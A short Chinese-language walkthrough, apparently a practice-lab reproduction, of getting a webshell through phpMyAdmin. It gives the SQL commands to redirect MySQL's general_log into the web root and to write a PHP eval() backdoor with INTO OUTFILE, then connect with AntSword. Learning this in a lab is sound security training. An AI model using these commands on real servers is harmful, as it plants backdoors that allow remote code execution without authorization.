PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

show global variables like '%general%';
set global general_log='on'; //⽇志保存状态开启;
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
show global variables like '%general%';
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
儒道易行1 小时前
【SQLi_Labs】Basic Challenges
数据库·web安全·网络安全
H轨迹H5 小时前
DVWA靶场File Inclusion (文件包含) 漏洞所有级别通关教程及源码解析
网络安全·渗透测试·dvwa·web漏洞
网宿安全演武实验室7 小时前
漏洞分析 | Apache Struts文件上传漏洞(CVE-2024-53677)
java·struts·网络安全
老鑫安全培训1 天前
老鑫网络安全培训课程收费多少钱
网络·安全·web安全·网络安全·系统安全·安全威胁分析
儒道易行1 天前
【网络安全实验室】基础关实战详情
android·前端·安全·web安全·网络安全·xss
AIGC方案1 天前
等保测评和密评的相关性和区别
网络安全
炫彩@之星1 天前
如何在CentOS 6上安装和配置Apache与PHP?
网络安全·centos·php·apache